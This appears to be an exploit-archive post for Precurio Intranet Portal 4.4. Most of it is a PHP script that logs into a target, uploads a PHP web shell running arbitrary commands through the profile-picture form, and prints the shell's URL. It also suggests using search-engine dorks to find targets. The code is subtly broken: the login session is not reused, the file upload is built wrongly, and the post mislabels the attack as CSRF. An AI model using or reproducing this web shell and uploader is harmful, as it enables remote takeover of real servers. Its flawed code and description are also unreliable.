=============================================================================================================================================
| # Title     : Precurio Intranet Portal 4.4 shell upload Vulnerability                                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://www.precurio.com                                                                                                    |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

   (Related : https://packetstorm.news/files/id/189604/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: php script.php <url> <username> <password>

[+] PayLoad :

<?php

function simulate_login($session, $url, $username, $password) {
    try {
        echo "Logging in...\n";
        sleep(1);
        $login_url = "{$url}/public/default/login/submit";
        $headers = [
            "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",
            "Content-Type" => "application/x-www-form-urlencoded"
        ];
        $data = [
            "username" => $username,
            "password" => $password
        ];

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $login_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);

        if (strpos($response, "Welcome System") !== false) {
            echo "Login Successful!\n";
            sleep(1);
            return true;
        } else {
            echo "Login Failed!\n";
            return false;
        }
    } catch (Exception $e) {
        echo "An error occurred during login: {$e->getMessage()}\n";
        return false;
    }
}

function upload_file($session, $url) {
    try {
        echo "Shell Preparing...\n";
        sleep(1);
        $upload_url = "{$url}/public/user/profile/update";
        $random_filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"), 0, 5) . ".php";
        $file_content = '<html><body><form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?></pre></body></html>';

        $file = [
            "profile_pic" => new CURLFile('php://temp', 'image/jpeg', $file_content)
        ];

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $upload_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ['profile_pic' => new CURLFile($file_content)]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);

        echo "Upload Response Status: " . (isset($response['status_code']) ? $response['status_code'] : "unknown") . "\n";

        if (strpos($response, ".php") !== false) {
            $path = extract_php_path($response);
            echo "Your shell is ready: {$url}/{$path}\n";
        } else {
            echo "Exploit Failed!\n";
            echo substr($response, 0, 500) . "\n";
        }
    } catch (Exception $e) {
        echo "An error occurred during file upload: {$e->getMessage()}\n";
    }
}

function extract_php_path($html_content) {
    if (preg_match('/src="([^"]+\.php)"/', $html_content, $matches)) {
        return $matches[1];
    }
    return "Path not found";
}

if ($argc != 4) {
    echo "Usage: php script.php <url> <username> <password>\n";
    exit(1);
}

$url = $argv[1];
$username = $argv[2];
$password = $argv[3];

$session = curl_init();

if (simulate_login($session, $url, $username, $password)) {
    upload_file($session, $url);
} else {
    echo "Cannot proceed without a valid login.\n";
}
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================